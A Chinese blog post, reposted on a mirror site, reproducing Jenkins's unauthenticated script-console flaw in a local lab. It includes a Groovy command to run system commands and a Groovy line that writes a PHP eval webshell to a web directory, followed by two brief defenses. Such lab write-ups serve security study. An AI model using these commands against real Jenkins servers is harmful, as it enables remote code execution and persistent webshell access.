zoukankan      html  css  js  c++  java
  • jenkins未授权访问漏洞复现

    0x00 漏洞描述

    未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

    0x01 漏洞环境搭建(win10)

    官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io

    运行setup.exe,安装即可,安装成功后在任务管理器中运行jenkins服务

     之后访问http://localhost:8080即可

     0x02 漏洞复现

    1、浏览器访问http://localhost:8080/manage,可以看到没有做任何限制,可以直接访问

     2、点击”脚本命令行”

    3、执行系统命令,下图看到成功执行系统命令

    println "whoami".execute().text

     4、利用”脚本命令行”上传webshell,内容如下:

    new File("D:\phpstudy_pro\WWW\ma.php").write('<?php @eval($_POST[cmd]);?>');

     成功写入

    5、蚁剑连接

     0x03 漏洞防御

    1、对后台控制页面做登录验证限制

    2、升级版本

    参考文章:https://www.cnblogs.com/yuzly/p/11255609.html

  • 相关阅读:
    分数的表示和运算
    用户管理
    DML,DDL
    索引
    sql语句执行顺序
    伪劣
    序列
    视图
    完整性约束
    ASP.NET MVC学习笔记(二)登陆验证
  • 原文地址:https://www.cnblogs.com/rnss/p/13378182.html
Copyright © 2011-2022 走看看